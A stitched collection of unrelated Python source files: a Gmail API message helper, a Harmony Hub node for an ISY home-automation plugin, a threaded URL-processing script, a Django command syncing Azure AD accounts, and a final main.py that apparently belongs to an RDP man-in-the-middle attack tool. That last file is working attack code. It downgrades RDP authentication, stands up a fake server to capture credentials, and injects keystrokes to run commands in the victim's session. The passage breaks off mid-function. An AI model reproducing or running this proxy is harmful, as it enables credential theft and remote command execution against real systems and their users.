.get(userId=user_id, id=message_ref["id"])
.execute()
)
if with_raw:
message_raw = self._build_raw_message_from_ref(user_id, message_ref)
except HttpError as error:
# Pass along the error
raise error
else:
return self._build_message_from_raw_json(message, message_raw=message_raw)
def _evaluate_message_payload(
self, payload: dict, user_id: str, msg_id: str, attachments: str = "reference"
) -> List[dict]:
"""
Recursively evaluates a message payload.
Args:
payload: The message payload object (response from Gmail API).
user_id: The current account address (default 'me').
msg_id: The id of the message.
attachments: Accepted values are 'ignore' which completely ignores
all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
A list of message parts.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if "attachmentId" in payload["body"]: # if it's an attachment
if attachments == "ignore":
return []
att_id = payload["body"]["attachmentId"]
filename = payload["filename"]
if not filename:
filename = "unknown"
obj = {
"part_type": "attachment",
"filetype": payload["mimeType"],
"filename": filename,
"attachment_id": att_id,
"data": None,
}
if attachments == "reference":
return [obj]
else: # attachments == 'download'
if "data" in payload["body"]:
data = payload["body"]["data"]
else:
res = (
self.service.users()
.messages()
.attachments()
.get(userId=user_id, messageId=msg_id, id=att_id)
.execute()
)
data = res["data"]
file_data = base64.urlsafe_b64decode(data)
obj["data"] = file_data
return [obj]
elif payload["mimeType"] == "text/html":
data = payload["body"]["data"]
data = base64.urlsafe_b64decode(data)
body = BeautifulSoup(data, "lxml", from_encoding="utf-8").body
return [{"part_type": "html", "body": str(body)}]
elif payload["mimeType"] == "text/plain":
data = payload["body"]["data"]
data = base64.urlsafe_b64decode(data)
body = data.decode("UTF-8")
return [{"part_type": "plain", "body": body}]
elif payload["mimeType"].startswith("multipart"):
ret = []
if "parts" in payload:
for part in payload["parts"]:
ret.extend(
self._evaluate_message_payload(
part, user_id, msg_id, attachments
)
)
return ret
return []
def _create_message(
self,
sender: str,
to: str,
subject: str = "",
msg_html: str = None,
msg_plain: str = None,
cc: List[str] = None,
bcc: List[str] = None,
attachments: List[str] = None,
signature: bool = False,
headers: List[dict] = [],
user_id: str = "me",
) -> dict:
"""
Creates the raw email message to be sent.
Args:
sender: The email address the message is being sent from.
to: The email address the message is being sent to.
subject: The subject line of the email.
msg_html: The HTML message of the email.
msg_plain: The plain text alternate message of the email (for slow
or old browsers).
cc: The list of email addresses to be Cc'd.
bcc: The list of email addresses to be Bcc'd
attachments: A list of attachment file paths.
signature: Whether the account signature should be added to the
message. Will add the signature to your HTML message only, or a
create a HTML message if none exists.
Returns:
The message dict.
"""
msg = MIMEMultipart("mixed" if attachments else "alternative")
msg["To"] = to
msg["From"] = sender
msg["Subject"] = subject
if cc:
msg["Cc"] = ", ".join(cc)
if bcc:
msg["Bcc"] = ", ".join(bcc)
if signature:
m = re.match(r".+\s<(?P<addr>.+@.+\..+)>", sender)
address = m.group("addr") if m else sender
account_sig = self._get_alias_info(address, user_id)["signature"]
if msg_html is None:
msg_html = ""
msg_html += "<br /><br />" + account_sig
attach_plain = MIMEMultipart("alternative") if attachments else msg
attach_html = MIMEMultipart("related") if attachments else msg
if msg_plain:
attach_plain.attach(MIMEText(msg_plain, "plain"))
if msg_html:
attach_html.attach(MIMEText(msg_html, "html"))
if attachments:
attach_plain.attach(attach_html)
msg.attach(attach_plain)
self._ready_message_with_attachments(msg, attachments)
return {"raw": base64.urlsafe_b64encode(msg.as_string().encode()).decode()}
def _ready_message_with_attachments(
self, msg: MIMEMultipart, attachments: List[str]
) -> None:
"""
Converts attachment filepaths to MIME objects and adds them to msg.
Args:
msg: The message to add attachments to.
attachments: A list of attachment file paths.
"""
for filepath in attachments:
content_type, encoding = mimetypes.guess_type(filepath)
if content_type is None or encoding is not None:
content_type = "application/octet-stream"
main_type, sub_type = content_type.split("/", 1)
with open(filepath, "rb") as file:
raw_data = file.read()
attm: MIMEBase
if main_type == "text":
attm = MIMEText(raw_data.decode("UTF-8"), _subtype=sub_type)
elif main_type == "image":
attm = MIMEImage(raw_data, _subtype=sub_type)
elif main_type == "audio":
attm = MIMEAudio(raw_data, _subtype=sub_type)
elif main_type == "application":
attm = MIMEApplication(raw_data, _subtype=sub_type)
else:
attm = MIMEBase(main_type, sub_type)
attm.set_payload(raw_data)
fname = os.path.basename(filepath)
attm.add_header("Content-Disposition", "attachment", filename=fname)
msg.attach(attm)
def _get_alias_info(self, send_as_email: str, user_id: str = "me") -> dict:
"""
Returns the alias info of an email address on the authenticated
account.
Response data is of the following form:
{
"sendAsEmail": string,
"displayName": string,
"replyToAddress": string,
"signature": string,
"isPrimary": boolean,
"isDefault": boolean,
"treatAsAlias": boolean,
"smtpMsa": {
"host": string,
"port": integer,
"username": string,
"password": string,
"securityMode": string
},
"verificationStatus": string
}
Args:
send_as_email: The alias account information is requested for
(could be the primary account).
user_id: The user ID of the authenticated user the account the
alias is for (default "me").
Returns:
The dict of alias info associated with the account.
"""
req = (
self.service.users()
.settings()
.sendAs()
.get(sendAsEmail=send_as_email, userId=user_id)
)
res = req.execute()
return res
|
Hub.py
|
from udi_interface import Node,LOGGER
import sys,logging,yaml,re
from traceback import format_exception
from threading import Thread,Event
from nodes import Device,Activity
from harmony_hub_funcs import ip2long,long2ip,get_valid_node_name,get_file
from pyharmony import client as harmony_client
from sleekxmpp.exceptions import IqError, IqTimeout
from copy import deepcopy
class Hub(Node):
def __init__(self, controller, address, name, host, port, watch=True, discover=False):
# The id (node_def_id) is the address because each hub has a unique nodedef in the profile.
# The id using the original case of the string
self.id = address
self.name = name
self.host = host
self.port = port
self.controller = controller
self.discover = discover
self.watch = False # Not watching yet
self.watch_init = watch
self.client = None
self.current_activity = -2
self.thread = None
self.client_status = None
self.event = None
self.harmony_config = self.controller.harmony_config
self.st = 0
# Can't poll until start runs.
self.do_poll = False
self.lpfx = "%s:%s:" % (name,address)
controller.poly.subscribe(controller.poly.START, self.handler_start, address.lower())
LOGGER.info("hub '%s' '%s' %s" % (address, name, host))
# But here we pass the lowercase, cause ISY doesn't allow the upper case!
# A Hub is it's own primary
super(Hub, self).__init__(controller.poly, address.lower(), address.lower(), name)
def handler_start(self):
LOGGER.info("hub '%s' '%s' %s" % (self.address, self.name, self.host))
self._set_st(0)
#
# Add host (IP) and port
#
self.setDriver('GV1', ip2long(self.host))
self.setDriver('GV2', self.port)
#
# Connect to the hub if desired
#
self.set_watch(self.watch_init)
#
# Call query to initialize and pull the info from the hub.
#
self.do_poll = True
LOGGER.info("done hub '%s' '%s' %s" % (self.address, self.name, self.host))
def set_watch(self,val):
if val:
if self.watch:
# Just make sure it's running
self.check_client()
else:
# Not watching, start it up
self.get_client()
self.watch = val
else:
# Just shut it down no matter what
self.stop()
# In case we restart
self.watch_init = val
def shortPoll(self):
# Query in poll mode, or if we haven't set the current_activity yet (which happens on startup)
#LOGGER.debug('watch={} client_status={}'.format(self.watch,self.client_status))
if self.watch:
if self.controller.activity_method == 1:
self._get_current_activity()
def longPoll(self):
#LOGGER.debug('watch={} client_status={}'.format(self.watch,self.client_status))
if self.watch:
self.check_client()
def query(self):
"""
Called by ISY to report all drivers for this node. This is done in
the parent class, so you don't need to override this method unless
there is a need.
"""
LOGGER.debug('watch={} client_status={}'.format(self.watch,self.client_status))
if self.watch:
if self.check_client():
self._get_current_activity()
self.reportDrivers()
def stop(self):
LOGGER.debug('...')
return self._close_client()
def restart(self):
# Called by controller to restart myself
self.stop()
self.start()
def _set_current_activity(self, id, force=False):
"""
Update Polyglot with the current activity.
"""
val = int(id)
if self.current_activity == val:
return True
# The harmony activity number
self.current_activity = val
index = self._get_activity_index(val)
LOGGER.info("activity=%d, index=%d" % (self.current_activity,index))
# Set to -1 to force a change.
self.setDriver('GV3', -1)
self.setDriver('GV3', index)
# Make the activity node current, unless it's -1 which is poweroff
ignore_id=False
if id != -1:
sid = str(id)
if sid in self.activity_nodes:
self.activity_nodes[str(id)]._set_st(1)
ignore_id=id
else:
LOGGER.error('activity {} not in nodes list.'.format(sid))
# Update all the other activities to not be the current.
self._set_all_activities(0,ignore_id=ignore_id)
return True
def get_client(self):
"""
Start the client in a thread so if it dies, we don't die.
"""
self.client_status = "init"
LOGGER.debug('Starting Thread')
self.event = Event()
self.thread = Thread(target=self._get_client)
self.thread.daemon = True
LOGGER.debug('Starting Thread')
st = self.thread.start()
LOGGER.debug('Back from Thread start st={}'.format(st))
def _get_client(self):
LOGGER.info("Initializing PyHarmony Client")
harmony_client.logger.setLevel(logging.INFO)
self.last_activity_method = self.controller.activity_method
try:
if self.controller.activity_method == 2:
self.client = harmony_client.create_and_connect_client(self.host, self.port, self._set_current_activity)
else:
self.client = harmony_client.create_and_connect_client(self.host, self.port)
if self.client is False:
LOGGER.error('harmony_client returned False, will retry connect during next shortPoll interval')
self._set_st(0)
self._close_client()
self.client_status = "failed"
return False
except:
LOGGER.error('Failed to connect to host "{}" port "{}"'.format(self.host,self.port),True)
self._set_st(0)
self._close_client()
self.client_status = "failed"
return False
LOGGER.info("PyHarmony client= " + str(self.client))
self._set_st(1)
# Setup activities and devices
self.init_activities_and_devices()
self._get_current_activity()
self.query()
self.client_status = True
# Hang around until asked to quit
LOGGER.debug('Wait until we are told to stop')
self.event.wait()
LOGGER.debug('Event is done waiting, Goodbye')
def check_client(self):
# Thread is none before we try to start it.
start_client = False
if self.thread is None:
LOGGER.info("Waiting for client thread to be created..")
return False
else:
if self.client is None:
LOGGER.info("Client was stopped. client{0}".format(self.client))
self._set_st(1)
else:
# Then client_status will be True when client is ready
if self.client_status is True:
if self.thread.is_alive():
if self.client.state.current_state() == 'connected':
# All seems good.
# If activity method changed from or to a 2 then we need to reconnect to register or unregister the callback
if self.last_activity_method != self.controller.activity_method and (self.last_activity_method == 2 or self.controller.activity_method == 2):
LOGGER.info("Activity method changed from {0} to {1}, need to restart client".format(self.last_activity_method,self.controller.activity_method))
self._set_st(0)
else:
self._set_st(1)
return True
else:
LOGGER.error("Client no longer connected. client.state={0}".format(self.client.state.current_state()))
self._close_client()
else:
# Need to restart the thread
LOGGER.error("Thread is dead, need to restart")
self._set_st(0)
else:
if self.thread.is_alive():
LOGGER.info("Waiting for client startup to complete, status = {0}..".format(self.client_status))
return False
else:
LOGGER.error("Client startup thread dead?, Please send log package to developer. status = {0}..".format(self.client_status))
self._set_st(0)
# If we had a connection issue previously, try to fix it.
if self.st == 0:
LOGGER.debug("Calling get_client st=%d" % (self.st))
if not self.get_client():
return False
self._set_st(1)
return True
def _close_client(self):
self._set_st(0)
LOGGER.debug('client={}'.format(self.client))
if self.client is not None:
if self.client is False:
LOGGER.debug('we have no client={}'.format(self.client))
else:
try:
LOGGER.debug('disconnecting client={}'.format(self.client))
self.client.disconnect(send_close=True)
LOGGER.debug('disconnected client={}'.format(self.client))
except:
LOGGER.error('client.disconnect failed',True)
return False
finally:
self.client = None
# Tells the thread to finish
LOGGER.debug('and finally client={} event={}'.format(self.client,self.event))
if self.event is not None:
LOGGER.debug('calling event.set')
self.event.set()
LOGGER.debug('returning')
return True
def _get_current_activity(self):
LOGGER.debug('...')
if self.check_client():
try:
ca = self.client.get_current_activity()
except IqTimeout:
LOGGER.error('client.get_current_activity timeout',False)
self._close_client()
return False
except:
LOGGER.error('client.get_current_activity failed',True)
self._set_st(0)
return False
self._set_st(1)
if int(self.current_activity) != int(ca):
LOGGER.debug(" poll={0} current={1}".format(ca,self.current_activity))
self._set_current_activity(ca)
return True
else:
return False
def _set_st(self, value):
value = int(value)
if hasattr(self,'st') and self.st != value:
self.st = int(value)
LOGGER.info("setDriver(ST,{0})".format(self.st))
return self.setDriver('ST', self.st)
def delete(self):
"""
Delete all my children and then myself
"""
LOGGER.warning("%s: Deleting myself and all my children",self.lpfx)
# We use the list of nodes in the config, not just our added nodes...
for node in self.controller.poly.config['nodes'].copy():
address = node['address']
if node['primary'] == self.address and node['address'] != self.address:
LOGGER.warning('%s Deleting my child %s "%s"',self.lpfx,address,node['name'])
self.controller.poly.delNode(address)
LOGGER.warning('%s Deleting myself',self.lpfx)
self.controller.poly.delNode(self.address)
def config_good(self):
if self.harmony_config is None:
LOGGER.error('%s Config was not loaded: %s',self.lpfx,self.harmony_config)
return False
return True
def init_activities_and_devices(self):
LOGGER.info("start")
self.activity_nodes = dict()
self.device_nodes = dict()
if not self.config_good():
return False
#
# Add all activities except -1 (PowerOff)
#
for a in self.harmony_config['info']['activities']:
if not 'hub' in a:
LOGGER.error("Can not add activity with no hub, is your config file old? Please re-run Build Profile and restart. %s",a)
else:
try:
if a['id'] != '-1' and self.address in a['hub']:
LOGGER.info("Activity: %s Id: %s" % (a['label'], a['id']))
self.add_activity(str(a['id']),a['label'])
except:
LOGGER.error("%s Error adding activity",self.lpfx,exc_info=True)
#
# Add all devices
#
for d in self.harmony_config['info']['devices']:
if not 'hub' in d:
LOGGER.error("Can not add device with no hub, is your config file old? Please re-run Build Profile and restart. %s",a)
else:
try:
if self.address in d['hub']:
LOGGER.info("Device :'%s' Id: '%s'" % (d['label'],d['id']))
self.add_device(str(d['id']),d['label'])
except:
LOGGER.error("%s Error adding device",self.lpfx,exc_info=True)
LOGGER.info("end")
def add_device(self,number,name):
# TODO: Pass in name and address as optional args.
node = self.controller.add_node(Device(self, number, get_valid_node_name(name)))
self.device_nodes[number] = node
return node;
def add_activity(self,number,name):
node = self.controller.add_node(Activity(self, number, get_valid_node_name(name)))
self.activity_nodes[number] = node
return node;
def start_activity(self, id=False, index=False):
"""
Start the activity
"""
if index is False and id is False:
LOGGER.error("Must pass id or index")
return False
if index is False:
index = self._get_activity_index(id)
elif id is False:
id = self._get_activity_id(index)
LOGGER.debug("id=%s index=%s" % (str(id),str(index)))
if self.client is None:
LOGGER.error("No Client" )
ret = False
else:
if id != -1:
ret = self.client.start_activity(id)
LOGGER.debug("id=%s result=%s" % (str(id),str(ret)))
else:
ret = self.client.power_off()
LOGGER.debug("power_off result=%s" % (str(ret)))
if ret:
# it worked, push it back to polyglot
self._set_current_activity(id)
return ret
def end_activity(self, id=False, index=False):
"""
End the activity
"""
if self.client is None:
LOGGER.error("No Client" )
ret = False
else:
# Only way to end, is power_off (activity = -1)
ret = self.client.power_off()
# TODO: Currently released version of pyharmony always returns None
# TODO: remove this if a new version is released.
ret = True
LOGGER.debug("ret=%s" % (str(ret)))
if ret:
self._set_current_activity(-1)
return ret
def _set_all_activities(self,val,ignore_id=False):
# All other activities are no longer current
for nid in self.activity_nodes:
if ignore_id is False:
self.activity_nodes[nid]._set_st(val)
else:
if int(nid) != int(ignore_id):
self.activity_nodes[nid]._set_st(val)
def _get_activity_id(self,index):
"""
Convert from activity index from nls, to real activity number
"""
LOGGER.debug(" %d" % (index))
if not self.config_good():
return False
return self.harmony_config['info']['activities'][index]['id']
def _get_activity_index(self,id):
"""
Convert from activity index from nls, to real activity number
"""
LOGGER.debug(str(id))
if not self.config_good():
return False
cnt = 0
for a in self.harmony_config['info']['activities']:
if int(a['id']) == int(id):
return cnt
cnt += 1
LOGGER.error("No activity id %s found." % (str(id)))
# Print them out for debug
for a in self.harmony_config['info']['activities']:
LOGGER.error(" From: label=%s, id=%s" % (a['label'],a['id']))
return False
def change_channel(self,channel):
LOGGER.debug("channel=%s" % (channel))
# Push it to the Hub
if self.client is None:
LOGGER.error("No Client for channel '%s'." % (channel))
ret = False
else:
try:
ret = self.client.change_channel(channel)
except (Exception) as err:
LOGGER.error('failed {0}'.format(err), True)
return False
LOGGER.debug("%s result=%s" % (channel,str(ret)))
# TODO: This always returns False :(
ret = True
return ret
def _cmd_set_current_activity(self, command):
"""
This runs when ISY changes the current current activity
"""
index = int(command.get('value'))
return self.start_activity(index=index)
def _cmd_change_channel(self, command):
"""
This runs when ISY calls set button which passes the button index
"""
channel = int(command.get('value'))
LOGGER.debug("channel=%d" % (channel))
return self.change_channel(channel)
def _cmd_off(self, command):
"""
This runs when ISY calls Off or Fast Off and sets the activity to poweroff
"""
LOGGER.debug("activity=%d" % (self.current_activity))
return self.end_activity()
def _cmd_delete(self, command):
"""
Delete's this Hub and all it's children from Polyglot
"""
LOGGER.debug("")
return self.delete()
drivers = [
{'driver': 'ST', 'value': 0, 'uom': 2}, # bool: Connection status to Hub
{'driver': 'GV1', 'value': 0, 'uom': 56}, # integer: IP Address
{'driver': 'GV2', 'value': 0, 'uom': 56}, # integer: Port
{'driver': 'GV3', 'value': 0, 'uom': 25}, # integer: Current Activity
{'driver': 'GV4', 'value': 0, 'uom': 56}, #
{'driver': 'GV5', 'value': 0, 'uom': 56}, #
]
commands = {
'QUERY': query,
'SET_ACTIVITY': _cmd_set_current_activity,
'CHANGE_CHANNEL': _cmd_change_channel,
'DOF': _cmd_off,
'DFOF': _cmd_off,
'DEL': _cmd_delete,
}
|
index.py
|
from concurrent.futures import process
from scripts.query import run as query
from scripts.execute import run as execute
from utils.mongo import Mongo
from threading import Thread
query()
threads = 24
documents = Mongo().get_all_documents()
def loop(start, stop):
for i in range(start, stop):
if documents[i]['processed'] is False:
execute(documents[i]['url'])
size = len(documents) / threads
for i in range(threads):
args = (int(size * i), int(size * i + size -1)) if i != threads - 1 else (int(size * i), int(size * i + size))
t = Thread(target = loop, args = args)
t.start()
|
check_azure_accounts.py
|
from datetime import datetime, timezone
from django.core.management.base import BaseCommand
import logging
from multiprocessing import Process, Queue
from organisation.models import DepartmentUser, CostCentre, Location
from organisation.utils import ms_graph_users
def get_users(queue):
# Worker function to call the Graph API via a process queue.
azure_users = queue.get()
azure_users = ms_graph_users()
queue.put(azure_users)
return
class Command(BaseCommand):
help = 'Checks licensed user accounts from Azure AD and creates/updates linked DepartmentUser objects'
def handle(self, *args, **options):
logger = logging.getLogger('organisation')
logger.info('Querying Microsoft Graph API for Azure AD user accounts')
# Call the MS Graph API in a separate process with a timeout.
azure_users = None
queue = Queue()
queue.put(azure_users)
process = Process(target=get_users, args=(queue,))
process.start()
process.join(timeout=80) # Give this function a maximum time to finish (process will block for this duration, regardless).
azure_users = queue.get()
if not process.exitcode == 0:
logger.error('Queued process did not complete in time')
return
if not azure_users:
logger.error('Microsoft Graph API returned no data')
return
logger.info('Comparing Department Users to Azure AD user accounts')
for az in azure_users:
if az['mail'] and az['displayName']: # Azure object has an email address and a display name; proceed.
if not DepartmentUser.objects.filter(azure_guid=az['objectId']).exists():
# No existing DepartmentUser is linked to this Azure AD user.
# A department user with matching email may already exist in IT Assets with a different azure_guid.
# If so, return a warning and skip that user.
# We'll need to correct this issue manually.
if DepartmentUser.objects.filter(email=az['mail'], azure_guid__isnull=False).exists():
existing_user = DepartmentUser.objects.filter(email=az['mail']).first()
logger.warning(
'Skipped {}: email exists and already associated with Azure ObjectId {} (this ObjectId is {})'.format(az['mail'], existing_user.azure_guid, az['objectId'])
)
continue # Skip to the next Azure user.
# A department user with matching email may already exist in IT Assets with no azure_guid.
# If so, associate the Azure AD objectId with that user.
if DepartmentUser.objects.filter(email=az['mail'], azure_guid__isnull=True).exists():
existing_user = DepartmentUser.objects.filter(email=az['mail']).first()
existing_user.azure_guid = az['objectId']
existing_user.azure_ad_data = az
existing_user.azure_ad_data_updated = datetime.now(timezone.utc)
existing_user.update_from_azure_ad_data()
logger.info('AZURE AD SYNC: linked existing user {} with Azure objectId {}'.format(az['mail'], az['objectId']))
continue # Skip to the next Azure user.
# Only create a new DepartmentUser instance if the Azure AD account has >0 licences assigned to it.
if az['assignedLicenses']:
if az['companyName'] and CostCentre.objects.filter(code=az['companyName']).exists():
cost_centre = CostCentre.objects.get(code=az['companyName'])
else:
cost_centre = None
if az['officeLocation'] and Location.objects.filter(name=az['officeLocation']).exists():
location = Location.objects.get(name=az['officeLocation'])
else:
location = None
new_user = DepartmentUser.objects.create(
azure_guid=az['objectId'],
azure_ad_data=az,
azure_ad_data_updated=datetime.now(timezone.utc),
active=az['accountEnabled'],
email=az['mail'],
name=az['displayName'],
given_name=az['givenName'],
surname=az['surname'],
title=az['jobTitle'],
telephone=az['telephoneNumber'],
mobile_phone=az['mobilePhone'],
cost_centre=cost_centre,
location=location,
dir_sync_enabled=az['onPremisesSyncEnabled'],
)
logger.info(f'AZURE AD SYNC: created new department user {new_user}')
else:
# An existing DepartmentUser is linked to this Azure AD user.
# Update the existing DepartmentUser object fields with values from Azure.
existing_user = DepartmentUser.objects.get(azure_guid=az['objectId'])
existing_user.azure_ad_data = az
existing_user.azure_ad_data_updated = datetime.now(timezone.utc)
existing_user.update_from_azure_ad_data()
# Iterate through department users and clear any nonexistent Azure AD GUID values.
azure_users = {i['objectId']: i for i in azure_users}
for du in DepartmentUser.objects.filter(azure_guid__isnull=False, email__iendswith='@dbca.wa.gov.au'):
if du.azure_guid not in azure_users:
logger.info("ONPREM AD SYNC: Azure AD GUID {} not found in MS Graph output; clearing it from {}".format(du.azure_guid, du))
du.azure_guid = None
du.azure_ad_data = {}
du.azure_ad_data_updated = datetime.now(timezone.utc)
du.assigned_licences = []
du.dir_sync_enabled = None
du.save()
logger.info('Completed')
|
main.py
|
import socket
import ssl
import threading
import select
import re
import os
import sys
import subprocess
import time
from binascii import hexlify, unhexlify
from base64 import b64encode
from seth.args import args
from seth.parsing import *
import seth.consts as consts
class RDPProxy(threading.Thread):
"""Represents the RDP Proxy"""
def __init__(self, local_conn, remote_socket):
super(RDPProxy, self).__init__()
self.cancelled = False
self.lsock = local_conn
self.rsock = remote_socket
self.vars = {}
self.injection_key_count = -100
self.keyinjection_started = False
if b"RC4-SHA" in subprocess.check_output('openssl ciphers'.split()):
self.rc4 = True
else:
print("Warning: RC4 not available on client, attack might not work")
self.rc4 = False
# self.relay_proxy = None
# if args.relay: # TODO
# threading.Thread(target=launch_rdp_client).start()
# relay_lsock, relay_rsock = open_sockets(consts.RELAY_PORT)
# self.relay_proxy = RDPProxyNTLMRelay(relay_lsock, relay_rsock)
# self.relay_proxy.start()
def run(self):
self.handle_protocol_negotiation()
if not (self.cancelled or self.vars["RDP_PROTOCOL"] == 0):
self.enableSSL()
if args.fake_server:
try:
self.run_fake_server()
except ConnectionResetError:
print("Connection lost on run_fake_server")
while not self.cancelled and not args.fake_server:
try:
self.forward_data()
except (ssl.SSLError, ssl.SSLEOFError) as e:
print("SSLError: %s" % str(e))
except (ConnectionResetError, OSError, ValueError) as e:
print("Connection lost (%s)" % str(e))
if "creds" in self.vars:
stop_attack()
def run_fake_server(self):
bufsize = 4096
# hide forged protocol
data = self.lsock.recv(bufsize)
dump_data(data, From="Client")
resp = consts.SERVER_RESPONSES[1]
regex = b".*%s..010c" % hexlify(b"McDn")
m = re.match(regex, hexlify(resp))
resp = set_fake_requested_protocol(resp, m,
self.vars["RDP_PROTOCOL"])
self.lsock.send(resp)
# start with channel join requests
data = self.lsock.recv(bufsize)
dump_data(data, From="Client")
data = self.lsock.recv(bufsize)
dump_data(data, From="Client")
self.lsock.send(consts.SERVER_RESPONSES[2])
# confirm all requests (reverse engineered; couldn't find
# documentation on this)
while True:
data = self.lsock.recv(bufsize)
dump_data(data, From="Client")
self.save_vars(parse_rdp(data, self.vars, From="Client"))
if "creds" in self.vars:
self.lsock.send(consts.SERVER_RESPONSES[3])
break
if data:
id = data[-1]
else:
id = 0
self.lsock.send(unhexlify(b"0300000f02f0803e00000803%02x03%02x" %
(id, id)))
self.close()
stop_attack()
def cancel(self):
self.close()
self.cancelled = True
def handle_protocol_negotiation(self):
data = self.lsock.recv(4096)
if not data:
print('No data returned')
self.cancelled = True
return None
dump_data(data, From="Client")
self.save_vars({"RDP_PROTOCOL_OLD": data[-4]})
data = downgrade_auth(data)
self.save_vars({"RDP_PROTOCOL": data[-4]})
if args.fake_server:
self.lsock.send(consts.SERVER_RESPONSES[0])
return None
try:
self.rsock.send(data)
except socket.error as e:
print("Error sending data: %s" % e)
os._exit(1)
try:
data = self.rsock.recv(4096)
except socket.error as e:
print("Error receiving data: %s" % e)
os._exit(1)
dump_data(data, From="Server")
regex = b"0300.*000300080005000000$"
m = re.match(regex, hexlify(data))
if m:
if not args.fake_server:
print("Server enforces NLA; switching to 'fake server' mode")
args.fake_server = True
data = consts.SERVER_RESPONSES[0]
try:
self.lsock.send(data)
except socket.error as e:
print("Error sending data: %s" % e)
os._exit(1)
def enableSSL(self):
print("Enable SSL")
try:
sslversion = get_ssl_version(self.lsock)
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.load_cert_chain(args.certfile, keyfile=args.keyfile, password=None)
self.lsock = ctx.wrap_socket(
self.lsock,
server_side=True,
do_handshake_on_connect=True,
)
if self.rc4:
try:
print("Try to use RC4-SHA cipher")
ctx.set_ciphers("RC4-SHA")
self.rsock = ctx.wrap_socket(
self.rsock,
do_handshake_on_connect=True,
)
except ssl.SSLError:
print("Not using RC4-SHA because of SSL Error:", str(e))
self.rsock = ctx.wrap_socket(
self.rsock,
do_handshake_on_connect=True,
)
except ConnectionResetError as e:
print("Unexpected error: %s" % e)
os._exit(1)
else:
self.rsock = ctx.wrap_socket(
self.rsock,
do_handshake_on_connect=True,
)
except ConnectionResetError as e:
print("Connection lost on enableSSL: %s" % e)
except ssl.SSLEOFError as e:
print("SSL EOF Error during handshake: %s" % e)
except AttributeError as e:
# happens when there is no rsock, i.e. fake_server==True
print(e)
pass
def close(self):
self.lsock.close()
if not args.fake_server:
self.rsock.close()
else:
pass
def forward_data(self):
readable, _, _ = select.select([self.lsock, self.rsock], [], [])
for s_in in readable:
if s_in == self.lsock:
From = "Client"
s_out = self.rsock
elif s_in == self.rsock:
From = "Server"
s_out = self.lsock
try:
data = read_data(s_in)
except ssl.SSLError as e:
self.handle_ssl_error(e)
data = b""
if not data:
self.cancel()
return False
dump_data(data, From=From)
self.save_vars(parse_rdp(data, self.vars, From=From))
data = tamper_data(data, self.vars, From=From)
s_out.send(data)
if From == "Client" and "creds" in self.vars and args.inject:
self.send_keyinjection(s_out)
return True
def save_vars(self, vars):
for k, v in vars.items():
if k not in self.vars:
self.vars[k] = v
print_var(k, self.vars)
def handle_ssl_error(self, e):
if "alert access denied" in str(e):
print("TLS alert access denied, Downgrading CredSSP")
self.lsock.send(unhexlify(b"300da003020104a4060204c000005e"))
elif "alert internal error" in str(e):
# openssl connecting to windows7 with AES doesn't seem to
# work, thus try RC4 first
print("TLS alert internal error received, make sure to use RC4-SHA")
else:
raise
def send_keyinjection(self, s_out):
attack = convert_str_to_scancodes(args.inject)
if self.injection_key_count == 0:
print('Injecting command...')
for key in attack:
# use fastpath
data = unhexlify(b"4404%02x%02x" % (key[1], key[0]))
dump_data(data, From="Client", Modified=True)
s_out.send(data)
time.sleep(key[2])
print("Pwnd")
self.injection_key_count += 1
def read_data(sock):
data = sock.recv(4096)
if len(data) == 4096:
while len(data)%4096 == 0:
data += sock.recv(4096)
return data
def open_sockets(port):
try:
local_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as e:
print("Error creating socket: %s" % e)
os._exit(1)
local_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
local_socket.bind((args.bind_ip, args.listen_port))
local_socket.listen()
print("Listening for new connection")
local_conn, addr = local_socket.accept()
print("Connection received from %s:%d" % addr)
remote_socket = None
if not args.fake_server:
try:
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as e:
print("Error creating socket: %s" % e)
os._exit(1)
try:
remote_socket.connect((args.target_host, port))
except socket.gaierror as e:
print("Address-related error connecting to server: %s" % e)
os._exit(1)
except socket.error as e:
print("Connection error: %s" % e)
os._exit(1)
return local_conn, remote_socket
def get_ssl_version(sock):
# Seth behaves differently depeding on the TLS protocol
# https://bugs.python.org/issue31453
# This is an ugly hack (as if the rest of this wasn't...)
versions = [
ssl.PROTOCOL_TLSv1,
ssl.PROTOCOL_TLSv1_1,
ssl.PROTOCOL_TLSv1_2,
]
firstbytes = sock.recv(16, socket.MSG_PEEK)
try:
return versions[firstbytes[10]-1]
except IndexError:
print("Unexpected SSL version: %s" % hexlify(firstbytes))
return versions[-1]
# def launch_rdp_client():
# time.sleep(1)
# p = subprocess.Popen(
# ["xfreerdp",
# "/v:%s:%d" % (args.bind_ip, consts.RELAY_PORT),
# "/u:%s\\%s" % (domain, user),
# ],
# )
def stop_attack():
os._exit(0)
def convert_str_to_scancodes(string):
uppercase_letters = "ABCDEFGHJIJKLMNOPQRSTUVWXYZ"
# Actually, the following depends on the keyboard layout
special_chars = {
":": ".",
"{": "[",
"}": "]",
"!": "1",
"@": "2",
"#": "3",
"$": "4",
"%": "5",
"^": "6",
"&": "7",
"*": "8",
"(": "9",
")": "0",
"<": ",",
">": ".",
"\"": "'",
"|": "\\",
"?": "/",
"_": "-",
"+": "=",
}
UP = 1
DOWN = 0
MOD = 2
# For some reason, the meta (win) key needs an additional modifier (+2)
result = [[consts.REV_SCANCODE["LMeta"], DOWN + MOD, .2],
[consts.REV_SCANCODE["R"], DOWN, 0],
[consts.REV_SCANCODE["R"], UP, 0.2],
[consts.REV_SCANCODE["LMeta"], UP + MOD, .1],
]
for c in string:
if c in uppercase_letters:
result.append([consts.REV_SCANCODE["LShift"], DOWN, 0.02])
result.append([consts.REV_SCANCODE[c], DOWN, 0])
result.append([consts.REV_SCANCODE[c], UP, 0])
result.append([consts.REV_SCANCODE["LShift"], UP, 0])
elif c in special_chars:
c = special_chars[c]
result.append([consts.REV_SCANCODE["LShift"], DOWN, 0.02])
result.append([consts.REV_SCANCODE[c], DOWN, 0])
result.append([consts.REV_SCANCODE[c], UP, 0])
result.append([consts.REV_SCANCODE["LShift"], UP, 0])
else:
c = c.upper()
result.append([consts.REV_SCANCODE[c], DOWN, 0])
result.append([consts.REV_SCANCODE[c], UP, 0])
result += [[consts.REV_SCANCODE["Enter"], DOWN, 0],
